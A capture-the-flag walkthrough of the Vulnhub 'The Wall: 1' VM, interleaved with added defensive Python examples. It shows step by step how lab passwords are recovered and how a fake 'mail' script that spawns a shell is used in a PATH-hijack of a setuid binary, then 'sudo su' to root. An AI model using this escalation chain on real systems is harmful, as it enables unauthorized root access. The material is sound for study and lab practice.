tick.Tack

The Wall: 1

The Wall 1 from Vulnhub


First, an nmap scan of the target IP shows that no ports are open to the outside at all.

root@kali:~/Security/wall# nmap -n -p- -T5 192.168.0.116
...
All 65535 scanned ports on 192.168.0.116 are filtered

With no exposed opening to be found, the next step is to see whether the target sends anything out on its own.

After starting Wireshark, I set a filter on the target IP.

Roughly every 10 seconds the target tries to connect to port 1337 on the attacking machine.
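The periodic connection attempt is the kind of pattern a defender looks for in the other direction: a host that calls out to the same address and port on a fixed timer. The following added example (not part of the original writeup; the flow records and the 192.168.0.10 address are constructed, since the post does not list the capture) groups connection attempts by (source, destination, port) and flags the groups whose inter-arrival times are nearly constant.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed sample: one row per outbound connection attempt as Wireshark
# would show it, as (seconds since capture start, src, dst, dst_port). The
# 192.168.0.116 -> :1337 rows mimic the ~10 s call-home described above;
# the 192.168.0.22 rows are irregular, human-driven noise.
SAMPLE_FLOWS = [
    (0.0,  "192.168.0.116", "192.168.0.10", 1337),
    (1.0,  "192.168.0.22",  "192.168.0.10", 22),
    (2.5,  "192.168.0.22",  "192.168.0.10", 22),
    (9.0,  "192.168.0.22",  "192.168.0.10", 22),
    (10.2, "192.168.0.116", "192.168.0.10", 1337),
    (19.9, "192.168.0.116", "192.168.0.10", 1337),
    (30.1, "192.168.0.116", "192.168.0.10", 1337),
    (33.0, "192.168.0.22",  "192.168.0.80", 443),
    (40.0, "192.168.0.116", "192.168.0.10", 1337),
    (40.5, "192.168.0.22",  "192.168.0.10", 22),
]


def find_beacons(flows, min_hits=4, max_jitter=1.0):
    """Group connection attempts by (src, dst, dst_port) and report the groups
    whose inter-arrival times are nearly constant.

    Returns a list of ((src, dst, dst_port), mean_interval_seconds) tuples.
    min_hits keeps one-off connections out; max_jitter is the largest
    standard deviation of the gaps (in seconds) still treated as a timer.
    """
    by_tuple = defaultdict(list)
    for ts, src, dst, dport in flows:
        by_tuple[(src, dst, dport)].append(ts)

    beacons = []
    for key, times in by_tuple.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        # The spread of the gaps is the jitter: a timer-driven call-home has
        # almost none, an interactive session is all over the place.
        if pstdev(gaps) <= max_jitter:
            beacons.append((key, round(mean(gaps), 1)))
    return beacons


if __name__ == "__main__":
    for (src, dst, dport), interval in find_beacons(SAMPLE_FLOWS):
        print(f"{src} -> {dst}:{dport} roughly every {interval}s")
```

The same grouping works over NetFlow or firewall logs; the thresholds are the tuning knobs, and on a real network the destination port alone (here 1337) would be a weak signal compared with the regularity of the timing.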

So let's listen on port 1337 and see what it sends.

root@kali:~/Security/wall# nc -lp 1337

                       .u!"`
                   .x*"`
               ..+"NP
            .z""   ?
          M#`      9     ,     ,
                   9 M  d! ,8P'
                   R X.:x' R'  ,
                   F F' M  R.d'
                   d P  @  E`  ,
      ss           P  '  P  N.d'
       x         ''        '
       X               x             .
       9     .f       !         .    $b
       4;    $k      /         dH    $f
       'X   ;$$     z  .       MR   :$
        R   M$$,   :  d9b      M'   tM
        M:  #'$L  ;' M `8      X    MR
        `$;t' $F  # X ,oR      t    Q;
         $$@  R$ H :RP' $b     X    @'
         9$E  @Bd' $'   ?X     ;    W
         `M'  `$M d$    `E    ;.o* :R   ..
          `    '  "'     '    @'   '$o*"'

              The Wall by @xerubus
          -= Welcome to the Machine =-


If you should go skating on the thin ice of modern life, dragging behind you the 
silent reproach of a million tear-stained eyes, don't be surprised when a crack 
in the ice appears under your feet. - Pink Floyd, The Thin Ice

We receive a welcome message, which looks like nothing more than Pink Floyd lyrics…

Not knowing what else to do, I ran nmap again to see whether receiving the message had tripped some switch.

root@kali:~/Security/wall# nmap -n -sT 192.168.0.116 -p-

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-12-19 18:15 CST
Nmap scan report for 192.168.0.116
Host is up (0.0048s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http
1965/tcp open  unknown
MAC Address: AC:BC:32:80:89:77 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 112.28 seconds

Two ports have been opened!

Port 80 is open, so let's look at it in a browser first.

The home page is just a group photo of Pink Floyd, but viewing the source reveals a comment and a string of digits.

<!--If you want to find out what's behind these cold eyes, you'll just have to claw your way through this disguise. - Pink Floyd, The Wall

Did you know? The Publius Enigma is a mystery surrounding the Division Bell album.  Publius promised an unspecified reward for solving the
riddle, and further claimed that there was an enigma hidden within the artwork.

737465673d3333313135373330646262623337306663626539373230666536333265633035-->

The comment seems to be saying that a password is hidden in the image.

Googling kali, stegano and password turns up a tool called steghide.

steghide can embed a file inside an image and protect it with a passphrase.

The string of digits in the comment should be the passphrase to use.

root@kali:~/Security/wall# steghide extract -sf pink_floyd.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!

The digits don't work as the passphrase when entered directly, so I tried converting them from hex.

root@kali:~/Security/wall# python -c 'print "737465673d3333313135373330646262623337306663626539373230666536333265633035".decode("hex");'
steg=33115730dbbb370fcbe9720fe632ec05

The decoded string looks meaningful, but using the trailing hex string as the passphrase still fails.

Finally, since it matches the md5 format, I simply threw it at Google and got the answer straight away: divisionbell

With the passphrase entered, a txt file is extracted, and its content looks like two more encoded values to solve.

root@kali:~/Security/wall# steghide extract -sf pink_floyd.jpg
Enter passphrase:
wrote extracted data to "pink_floyd_syd.txt".
root@kali:~/Security/wall# cat pink_floyd_syd.txt
Hey Syd,

I hear you're full of dust and guitars?

If you want to See Emily Play, just use this key: U3lkQmFycmV0dA==|f831605ae34c2399d1e5bb3a4ab245d0

Roger

Did you know? In 1965, The Pink Floyd Sound changed their name to Pink Floyd.  The name was inspired
by Pink Anderson and Floyd Council, two blues muscians on the Piedmont Blues record Syd Barret had in
his collection.

Base64-decoding the first half gives: SydBarrett

Googling the second half as an md5 hash gives: pinkfloydrocks

After solving these two keys there are no further clues.

Next, let's try port 1965 that nmap found earlier and see whether it is ssh.

root@kali:~/Security/wall# nc 192.168.0.116 1965
SSH-2.0-OpenSSH_7.0

Let's try the two strings we just obtained as username and password.

root@kali:~/Security/wall# ssh SydBarrett@192.168.0.116 -p 1965
The authenticity of host '[192.168.0.116]:1965 ([192.168.0.116]:1965)' can't be established.
ECDSA key fingerprint is 6c:2b:d1:2c:4f:1c:b5:7a:1b:1e:e9:4b:8e:9b:4b:5a.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.0.116]:1965' (ECDSA) to the list of known hosts.
SydBarrett@192.168.0.116's password:
Could not chdir to home directory /home/SydBarrett: No such file or directory
This service allows sftp connections only.
Connection to 192.168.0.116 closed.

結果被系統打槍,只好照他說的用sftp登入,接著把裡面的東西通通抓回來研究

root@kali:~/Security/wall# sftp -P1965 SydBarrett@192.168.0.116
SydBarrett@192.168.0.116's password:
Connected to 192.168.0.116.
sftp> sl
Invalid command.
sftp> ls -al
drwxr-x---    3 0        1000          512 Oct 24 20:16 .
drwxr-x---    3 0        1000          512 Oct 24 20:16 ..
drwxr-xr-x    3 0        1000          512 Oct 24 18:17 .mail
-rw-r--r--    1 0        1000         1912 Oct 25 22:56 bio.txt
-rw-r--r--    1 0        1000       868967 Oct 24 16:17 syd_barrett_profile_pic.jpg
sftp> get bio.txt
Fetching /bio.txt to bio.txt
/bio.txt                                                                100% 1912     1.9KB/s   00:00
sftp> get syd_barrett_profile_pic.jpg
Fetching /syd_barrett_profile_pic.jpg to syd_barrett_profile_pic.jpg
/syd_barrett_profile_pic.jpg                                            100%  849KB 848.6KB/s   00:00
sftp> cd .mail
sftp> ls
sent-items
sftp> ls -al
drwxr-xr-x    3 0        1000          512 Oct 24 18:17 .
drwxr-x---    3 0        1000          512 Oct 24 20:16 ..
drwxr-xr-x    2 0        1000          512 Nov 11 10:25 .stash
-rw-r--r--    1 0        1000          309 Oct 24 18:18 sent-items
sftp> get sent-items
Fetching /.mail/sent-items to sent-items
/.mail/sent-items                                                       100%  309     0.3KB/s   00:00
sftp> cd .
../      ./       .stash/
sftp> cd .stash/
sftp> ls
eclipsed_by_the_moon
sftp> ls -al
drwxr-xr-x    2 0        1000          512 Nov 11 10:25 .
drwxr-xr-x    3 0        1000          512 Oct 24 18:17 ..
-rw-r--r--    1 0        1000     48884479 Aug  7 14:33 eclipsed_by_the_moon
sftp> get eclipsed_by_the_moon
Fetching /.mail/.stash/eclipsed_by_the_moon to eclipsed_by_the_moon
/.mail/.stash/eclipsed_by_the_moon                                      100%   47MB   5.8MB/s   00:00
sftp>

Looking through it all, the most suspicious items are the content of sent-items and eclipsed_by_the_moon.

It says to use scalpel on the stash once you find it??

root@kali:~/Security/wall# cat sent-items
Date: Sun, 24 Oct 1965 18:45:21 +0200
From: Syd Barrett <syd@pink.floyd>
Reply-To: Syd Barret <syd@pink.floyd>
To: Roger Waters <roger@pink.floyd>
Subject: Had to hide the stash

Roger... I had to hide the stash.

Usual deal.. just use the scalpel when you find it.

Ok, sorry for that.

Rock on man

"Syd"

Inspecting eclipsed_by_the_moon shows that it is actually a gz file.

Decompressing it yields a tar archive, which is then extracted with tar in turn.

root@kali:~/Security/wall/ec# file eclipsed_by_the_moon.lsd
eclipsed_by_the_moon.lsd: DOS/MBR boot sector, code offset 0x3c+2, OEM-ID "MSDOS5.0", sectors/cluster 2, reserved sectors 8, root entries 512, Media descriptor 0xf8, sectors/FAT 188, sectors/track 63, heads 255, hidden sectors 2048, sectors 96256 (volumes > 32 MB) , serial number 0x9e322180, unlabeled, FAT (16 bit)

In the end we get an lsd file.

After reading up on scalpel's usage, I enabled the file types to search for in /etc/scalpel/scalpel.conf.

root@kali:~/Security/wall# scalpel eclipsed_by_the_moon.lsd
Scalpel version 1.60
Written by Golden G. Richard III, based on Foremost 0.69.

Opening target "/root/Security/wall/eclipsed_by_the_moon.lsd"

Image file pass 1/2.
eclipsed_by_the_moon.lsd: 100.0% |*****************************************************|   47.0 MB    00:00 ETAAllocating work queues...
Work queues allocation complete. Building carve lists...
Carve lists built.  Workload:
jpg with header "\xff\xd8\xff\xe0\x00\x10" and footer "\xff\xd9" --> 1 files
Carving files from image.
Image file pass 2/2.
eclipsed_by_the_moon.lsd: 100.0% |*****************************************************|   47.0 MB    00:00 ETAProcessing of image file complete. Cleaning up...
Done.
Scalpel is done, files carved = 1, elapsed = 0 seconds.
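The workload line above states the whole of scalpel's rule for this run: a JPEG starts with `\xff\xd8\xff\xe0\x00\x10` and ends at the first `\xff\xd9` that follows, within the size limit from scalpel.conf. The following added example (not part of the original writeup or of scalpel itself) implements that header/footer carving directly, so the step is reproducible without the tool; the image bytes are constructed inline, and the "no footer found" policy (carve the maximum size) is this example's own choice, mirroring scalpel's behaviour as I understand it.

```python
# Signature scalpel reported for the run above: JFIF header, EOI footer.
JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10"
JPEG_FOOTER = b"\xff\xd9"
DEFAULT_MAX = 200 * 1024 * 1024  # size cap, the role scalpel.conf's size column plays

# Constructed test image: filler, one complete JPEG-like blob, more filler,
# and a second header whose footer is missing (a truncated or overwritten file).
SAMPLE_JPEG = JPEG_HEADER + b"JFIF\x00\x01\x01" + b"\x01" * 40 + JPEG_FOOTER
TRUNCATED_JPEG = JPEG_HEADER + b"JFIF\x00" + b"\x02" * 200  # no footer


def build_sample_image():
    """Return the constructed disk image used by the demo and the tests."""
    return b"\x00" * 4096 + SAMPLE_JPEG + b"\x00" * 1024 + TRUNCATED_JPEG


def carve(image, header, footer, max_size=DEFAULT_MAX):
    """Header/footer carving over a raw image.

    For every header occurrence, take bytes up to and including the first
    footer that appears within max_size bytes of the header. If no footer is
    found inside that window, carve max_size bytes (or to end of image).
    Returns a list of (offset, carved_bytes) tuples, in offset order.
    """
    results = []
    pos = image.find(header)
    while pos != -1:
        window = image[pos:pos + max_size]
        # Start the footer search after the header so a footer byte pattern
        # inside the header itself can never terminate the file early.
        end = window.find(footer, len(header))
        carved = window if end == -1 else window[:end + len(footer)]
        results.append((pos, carved))
        pos = image.find(header, pos + len(header))
    return results


def carve_file(path, max_size=DEFAULT_MAX):
    """Carve JPEGs from a file on disk with the signature used above."""
    with open(path, "rb") as fh:
        return carve(fh.read(), JPEG_HEADER, JPEG_FOOTER, max_size)


if __name__ == "__main__":
    for offset, data in carve(build_sample_image(), JPEG_HEADER, JPEG_FOOTER, max_size=64):
        complete = data.endswith(JPEG_FOOTER)
        print(f"offset {offset}: {len(data)} bytes, footer {'found' if complete else 'missing'}")
```

The same routine, fed a disk or partition image, is what an incident responder uses to recover deleted files from unallocated space; the only things that change are the signature table and the size cap.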

That yields Roger Waters' password, so let's try logging in over ssh with his account.

root@kali:~/Security/wall/roger_waters# ssh RogerWaters@192.168.0.116 -p1965
RogerWaters@192.168.0.116's password:
Permission denied, please try again.
RogerWaters@192.168.0.116's password:
Permission denied, please try again.
RogerWaters@192.168.0.116's password:
OpenBSD 5.8 (GENERIC) #1066: Sun Aug 16 02:33:00 MDT 2015

                       .u!"`
                   .x*"`
               ..+"NP
            .z""   ?
          M#`      9     ,     ,
                   9 M  d! ,8P'
                   R X.:x' R'  ,
                   F F' M  R.d'
                   d P  @  E`  ,
      ss           P  '  P  N.d'
       x         ''        '
       X               x             .
       9     .f       !         .    $b
       4;    $k      /         dH    $f
       'X   ;$$     z  .       MR   :$
        R   M$$,   :  d9b      M'   tM
        M:  #'$L  ;' M `8      X    MR
        `$;t' $F  # X ,oR      t    Q;
         $$@  R$ H :RP' $b     X    @'
         9$E  @Bd' $'   ?X     ;    W
         `M'  `$M d$    `E    ;.o* :R   ..
          `    '  "'     '    @'   '$o*"'
$ uname -a
OpenBSD thewall.localdomain 5.8 GENERIC#1066 i386
$ id
uid=1002(RogerWaters) gid=1002(RogerWaters) groups=1002(RogerWaters)

We finally have a shell; the next step is to find a way to escalate privileges.

Some digging shows there are five users on the system. We already have two of them, so presumably we have to work through all five.

$ cat /etc/passwd
...
SydBarrett:*:1000:1000:Syd Barrett:/home/SydBarrett:/sbin/nologin
NickMason:*:1001:1001:Nick Mason:/home/NickMason:/bin/ksh
RogerWaters:*:1002:1002:Roger Waters:/home/RogerWaters:/bin/ksh
RichardWright:*:1003:1003:Richard Wright:/home/RichardWright:/bin/ksh
DavidGilmour:*:1004:1004:David Gilmour:/home/DavidGilmour:/bin/ksh

Next, look for files on the system with the setuid bit set.

$ for i in $(find / -perm -4000 2>/dev/null); do ls -al $i; done
...
-rws--s--x  1 NickMason  NickMason  7291 Aug  8 00:33 /usr/local/bin/brick
-rwsr-s---  1 DavidGilmour  RichardWright  7524 Oct 25 07:58 /usr/local/bin/shineon

Two files were found, but the only one we can execute is /usr/local/bin/brick.

Running it and answering the question gives us NickMason's privileges.

$ /usr/local/bin/brick
...
Who is the only band member to be featured on every Pink Floyd album? : Nick Mason
/bin/sh: Cannot determine current working directory
$ id
uid=1001(NickMason) gid=1001(NickMason) groups=1002(RogerWaters)

Browsing NickMason's home directory turned up nothing useful, so I transferred nick_mason_profile_pic.jpg back to the attacking machine.

I assumed it was an image, but a closer look shows it is an ogg file.

Playing it, you hear a melody mixed with what should be Morse code.

It could be decoded by ear, but to avoid wasting time I dropped it into Sonic Visualiser and let it graph the signal, which is the safer route XD

The result is richardwright1943farfisa

$ su RichardWright
Password:
ksh: Cannot determine current working directory
$ id
uid=1003(RichardWright) gid=1003(RichardWright) groups=1003(RichardWright)
$

Next, run /usr/local/bin/shineon with RichardWright's privileges.

$ /usr/local/bin/shineon
Menu

1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit

Testing each option shows that all of them just run stock system programs.

A quick look at /usr/local/bin/shineon with strings:

$ strings /usr/local/bin/shineon
...
Time - The Dark Side of the Moon
/usr/bin/cal
Press ENTER to continue.
Echoes - Meddle
/usr/bin/who
Is There Anybody Out There? - The Wall
/sbin/ping -c 3 www.google.com
Keep Talking- The Division Bell
mail

Apart from mail, everything is executed by absolute path, so presumably PATH can be modified here to get the effect of the SUID bit.

$ echo $PATH
/home/RogerWaters/bin:/bin:/sbin:/usr/bin:/usr/sbin:/usr/X11R6/bin:/usr/local/bin:/usr/local/sbin:/usr/games:.

Here /home/RogerWaters/bin is already first in $PATH.

Next, switch back to the RogerWaters account and create a fake mail in the bin directory.

But since RogerWaters' home directory is not world-accessible, its permissions also have to be opened up so other accounts can use it.

$ mkdir bin
$ cd bin
$ echo '#!/usr/local/bin/python' > mail
$ echo 'import pty' >> mail
$ echo 'pty.spawn("/bin/sh")' >> mail
$ chmod +x mail

Once that is set up, switch back to RichardWright and run /usr/local/bin/shineon again, and we have DavidGilmour's privileges.

$ /usr/local/bin/shineon
Menu

1. Calendar
2. Who
3. Check Internet
4. Check Mail
5. Exit
4
Keep Talking- The Division Bell
/bin/sh: Cannot determine current working directory
$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
$
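The defect that makes this work is that a setuid program resolves `mail` through the caller's PATH while honouring the rest of the caller's environment. The following added example (not shineon's code, whose source the writeup does not show; it assumes shineon does a PATH lookup for `mail`, which the strings output and the result above suggest) puts the vulnerable resolution next to the hardened one, using a constructed temporary directory standing in for a caller-writable bin directory.

```python
import os
import shutil
import tempfile

# What a privileged launcher should use instead of the caller's PATH.
SAFE_PATH = "/usr/bin:/bin:/usr/sbin:/sbin"
# Variables harmless enough to pass through to the child; everything else
# (PATH, LD_*, IFS, ...) is dropped.
SAFE_ENV_KEYS = ("TERM", "LANG")


def resolve_untrusted(command, env):
    """Vulnerable pattern: look the command up through whatever PATH the
    (unprivileged) caller handed us. Any writable directory placed first in
    PATH decides which binary runs with the elevated euid."""
    return shutil.which(command, path=env.get("PATH", ""))


def resolve_hardened(command):
    """Hardened pattern: ignore the caller's PATH and resolve only against a
    fixed list of system directories. Returns None if the command is not
    there, which the launcher should treat as an error, not a fallback."""
    return shutil.which(command, path=SAFE_PATH)


def hardened_env(env):
    """Environment to hand to the child: fixed PATH plus a small allowlist.
    This is the Python equivalent of clearing the environment before
    system()/execve() in a setuid C program."""
    clean = {key: env[key] for key in SAFE_ENV_KEYS if key in env}
    clean["PATH"] = SAFE_PATH
    return clean


def demo():
    """Constructed scenario: a caller-writable directory holding its own
    'mail' sits first in PATH, alongside a hostile LD_PRELOAD. Returns a
    summary of how each resolution strategy behaves."""
    with tempfile.TemporaryDirectory() as writable_dir:
        stand_in = os.path.join(writable_dir, "mail")
        with open(stand_in, "w") as fh:
            fh.write("#!/bin/sh\necho stand-in mail\n")  # constructed placeholder
        os.chmod(stand_in, 0o755)

        caller_env = {
            "PATH": writable_dir + os.pathsep + SAFE_PATH,
            "LD_PRELOAD": "/tmp/placeholder.so",  # constructed, never loaded
            "TERM": "xterm",
        }
        untrusted = resolve_untrusted("mail", caller_env)
        hardened = resolve_hardened("mail")
        return {
            "untrusted": untrusted,
            "hardened": hardened,
            "untrusted_hijacked": untrusted is not None and untrusted.startswith(writable_dir),
            "hardened_hijacked": hardened is not None and hardened.startswith(writable_dir),
            "child_env": hardened_env(caller_env),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The audit check that follows from this: for every setuid or setgid binary, confirm that each program it launches is named by absolute path and that the environment is reset before the launch; `strings`, as used above, is a quick first pass for spotting a bare command name.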

In DavidGilmour's home directory there is an anotherbrick.txt containing a URL.

$ cat anotherbrick.txt
# Come on you raver, you seer of visions, come on you painter, you piper, you prisoner, and shine. - Pink Floyd, Shine On You Crazy Diamond

New website for review:    pinkfloyd1965newblogsite50yearscelebration-temp/index.php

# You have to be trusted by the people you lie to. So that when they turn their backs on you, you'll get the chance to put the knife in. - Pink Floyd, Dogs
$

Opening the page, there is a comment at the end of the source.

<!--Through the window in the wall, come streaming in on sunlight wings, a million bright ambassadors of morning. - Pink Floyd, Echoes
Can you see what the Dog sees? Perhaps hints of lightness streaming in on sunlight wings?-->

There seem to be two rows of text beneath the dog; adjusting brightness and contrast reveals

/welcometothemachine
50696e6b466c6f796435305965617273

Hex-decoding 50696e6b466c6f796435305965617273 gives PinkFloyd50Years
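Every token in this box so far (the comment string on the index page, the two halves of the key in pink_floyd_syd.txt, and this one) is an opaque string that had to be guessed at: hex, base64, or a digest to look up. The following added example (not part of the original writeup) is the classifier I would reach for instead of guessing: it reports every plausible reading of a token rather than the first one, which matters here because a 32-character hex string can both decode to ASCII and have the shape of an md5 digest.

```python
import base64
import binascii
import re
import string

# Characters we accept in a "meaningful" decode: printable ASCII minus the
# vertical-tab and form-feed control characters.
PRINTABLE = set(string.printable) - set("\x0b\x0c")
DIGEST_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}


def _printable_ascii(data):
    """Return the decoded text if data is non-empty printable ASCII, else None."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return None
    if text and all(ch in PRINTABLE for ch in text):
        return text
    return None


def interpret(token):
    """Return every plausible reading of an opaque token as (kind, value) pairs.

    Readings are not mutually exclusive: a token is reported as hex-ascii,
    digest-shaped and base64-ascii in any combination that fits, in that
    order. An empty list means none of the three readings applies.
    """
    token = token.strip()
    readings = []

    # Hex: even length, hex digits only. Report an ASCII decode if it has one,
    # and separately note digest-shaped lengths, since both can hold at once.
    if re.fullmatch(r"[0-9a-fA-F]+", token) and len(token) % 2 == 0:
        text = _printable_ascii(bytes.fromhex(token))
        if text is not None:
            readings.append(("hex-ascii", text))
        if len(token) in DIGEST_LENGTHS:
            readings.append(("digest-shaped", DIGEST_LENGTHS[len(token)]))

    # Base64: standard alphabet, optional padding, length a multiple of four.
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", token) and len(token) % 4 == 0:
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            raw = b""
        text = _printable_ascii(raw)
        if text is not None:
            readings.append(("base64-ascii", text))

    return readings


def interpret_key(line):
    """Split an 'a|b' style key like the one in pink_floyd_syd.txt and
    interpret each part. Returns {part: readings}."""
    return {part: interpret(part) for part in line.split("|")}


if __name__ == "__main__":
    for token in ("50696e6b466c6f796435305965617273", "U3lkQmFycmV0dA=="):
        print(token, "->", interpret(token))
```

On this token the classifier returns both readings, which is exactly the ambiguity that bites later in the writeup, when the decoded string is not what the PinkFloyd binary wants.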

Entering /welcometothemachine in the address bar returns 403 Forbidden.

Going to /var/www on the box, the group on htdocs is set to welcometothemachine.

$ id
uid=1003(RichardWright) euid=1004(DavidGilmour) gid=1003(RichardWright) groups=1003(RichardWright)
$ cat /etc/group
welcometothemachine:*:1005:DavidGilmour

After being stuck here for ten minutes, I resigned myself to going back to the home directory to look for other clues.

Finally, I found a string in david_gilmour_profile_pic.jpg.

Using it as the password logs into DavidGilmour's account orz

$ strings david_gilmour_profile_pic.jpg
who_are_you_and_who_am_i
$ su DavidGilmour
Password:
$ id
uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)

Back in /var/www/htdocs from before, I eventually found the executable PinkFloyd.

I assumed the decoded string was the right answer, but it was the original string that, once entered, gave new privileges orz

$ ./PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: PinkFloyd50Years

Denied....
If I had my way, I'd have all of ya shot. - Pink Floyd, In The Flesh
$ ./PinkFloyd
Please send your answer to Old Pink, in care of the Funny Farm. - Pink Floyd, Empty Spaces
Answer: 50696e6b466c6f796435305965617273

Fearlessly the idiot faced the crowd smiling. - Pink Floyd, Fearless

Congratulations... permission has been granted.
You can now set your controls to the heart of the sun!
$ id
uid=1004(DavidGilmour) gid=1004(DavidGilmour) groups=1004(DavidGilmour), 1(daemon), 67(www), 1005(welcometothemachine)

Getting the daemon and www groups left me a bit lost, until I realised that what we had actually gained was sudo.

$ sudo -l
Password:
Matching Defaults entries for DavidGilmour on thewall:
    env_keep+="FTPMODE PKG_CACHE PKG_PATH SM_PATH SSH_AUTH_SOCK"

User DavidGilmour may run the following commands on thewall:
    (ALL) SETENV: ALL
    (ALL) SETENV: ALL

$ sudo su
# id
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
# cat /root/flag.txt

"The band is fantastic, that is really what I think. Oh, by the way, which one is Pink? - Pink Floyd, Have A Cigar"

                   Congratulations on rooting thewall!

   ___________________________________________________________________
  | |       |       |       |       |       |       |       |       | |
  |_|_______|_______|______ '__  ___|_______|_______|_______|_______|_|
  |     |       |       |   |  )      /         |       |       |     |
  |_____|_______|_______|__ |,' , .  | | _ , ___|_______|_______|_____|
  | |       |       |      ,|   | |\ | | ,' |       |       |       | |
  |_|_______|_______|____ ' | _ | | \| |'\ _|_______|_______|_______|_|
  |     |       |       |   \  _' '  ` |  \     |       |       |     |
  |_____|_______|_______|_  ,-'_ _____ | _______|_______|_______|_____|
  | |       |       |   ,-'|  _     |       |       |       |       | |
  |_|_______|_______|__  ,-|-' |  ,-. \ /_.--. _____|_______|_______|_|
  |     |       |          |   |  | |  V  |   ) |       |       |     |
  |_____|_______|_______|_ | _ |-'`-'  |  | ,' _|_______|_______|_____|
  | |       |       |      |        |  '  ;'        |       |       | |
  |_|_______|_______|______"|_____  _,- o'__|_______|_______|_______|_|
  |     |       |       |       _,-'    .       |       |       |     |
  |_____|_______|_______|_ _,--'\      _,-'_____|_______|_______|_____|
  | |       |       |     '     ||_||-' _   |       |       |       | |
  |_|_______|_______|_______|__ || ||,-'  __|_______|_______|_______|_|
  |     |       |       |       |  ||_,-'       |       |       |     |
  |_____|_______|______.|_______.__  ___|_______|_______|_______|_____|
  | |       |       |   \    |     /        |       |       |       | |
  |_|_______|_______|___ \ __|___ /,  _ |   | ______|_______|_______|_|
  |     |       |       | \      // \   |   |   |       |       |     |
  |_____|_______|_______|_ \ /\ //--'\  |   | __|_______|_______|_____|
  | |       |       |       '  V/    |  |-' |__,    |       |       | |
  |_|_______|_______|_______|_______ _______'_______|_______|_______|_|
  |     |       |       |       |       |       |       |       |     |
  |_____|_______|_______|_______|_______|_______|_______|_______|_____|
  |_________|_______|_______|_______|_______|_______|_______|_______|_|

                  Celebrating 50 years of Pink Floyd!
             Syd Barrett (RIP), Nick Mason, Roger Waters,
               Richard Wright (RIP), and David Gilmour.


** Shoutouts **
+ @vulnhub for making it all possible
+ @rastamouse @thecolonial - "the test bunnies"

-=========================================-
-  xerubus (@xerubus - www.mogozobo.com)  -
-=========================================-
#

Six hours later, finally got the flag TT